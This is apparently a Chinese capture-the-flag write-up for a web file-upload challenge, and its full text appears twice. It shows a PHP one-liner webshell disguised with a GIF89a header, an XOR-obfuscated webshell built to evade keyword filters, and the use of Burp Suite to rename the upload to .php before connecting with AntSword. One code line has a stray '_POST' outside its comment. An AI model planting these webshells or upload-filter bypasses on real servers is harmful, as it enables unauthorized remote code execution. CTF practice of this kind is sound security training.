WEB

题目

 进去之后看到这样一句话

 ctrl+u得到提示

 按照提示进去看看，发现是个文件上传的链接

按照提示修改staus的值然后上传一个木马文件看看

 发现报错了，只允许上传图片文件

 把后缀改成jpg再试试看

 依旧报错，它不仅对后缀名有要求而且会检查文件格式是否符合图片

给一句话木马的开头加上图片格式进行绕过

GIF89a

<?php @eval($_POST["yexi"]);?>

还是哒咩~过滤太多函数了

利用异或的方法重新构造一句话木马

GIF89a

<?=

@$_++;

$___=("~"^"?").("~"^"-").("~"^"-").("~"^";").("~"^",").("~"^"*");//ASSERT

$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");_POST

$___(${$__}[1]);//ASSERT($_POST[1])

?>

因为上传的过程中会检查文件中的关键词所以要把注释去掉，不然会报错

用burpsuite进行抓包，将上传的jpg文件改成php，放掉

 上传成功，可以在uploads中查看

 用蚁剑连接，注意勾选base64,连接成功

 按照提示打开index.php即可得到flag

WEB

题目

 进去之后看到这样一句话

 ctrl+u得到提示

 按照提示进去看看，发现是个文件上传的链接

按照提示修改staus的值然后上传一个木马文件看看

 发现报错了，只允许上传图片文件

 把后缀改成jpg再试试看

 依旧报错，它不仅对后缀名有要求而且会检查文件格式是否符合图片

给一句话木马的开头加上图片格式进行绕过

GIF89a

<?php @eval($_POST["yexi"]);?>

还是哒咩~过滤太多函数了

利用异或的方法重新构造一句话木马

GIF89a

<?=

@$_++;

$___=("~"^"?").("~"^"-").("~"^"-").("~"^";").("~"^",").("~"^"*");//ASSERT

$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");_POST

$___(${$__}[1]);//ASSERT($_POST[1])

?>

因为上传的过程中会检查文件中的关键词所以要把注释去掉，不然会报错

用burpsuite进行抓包，将上传的jpg文件改成php，放掉

 上传成功，可以在uploads中查看

 用蚁剑连接，注意勾选base64,连接成功

 按照提示打开index.php即可得到flag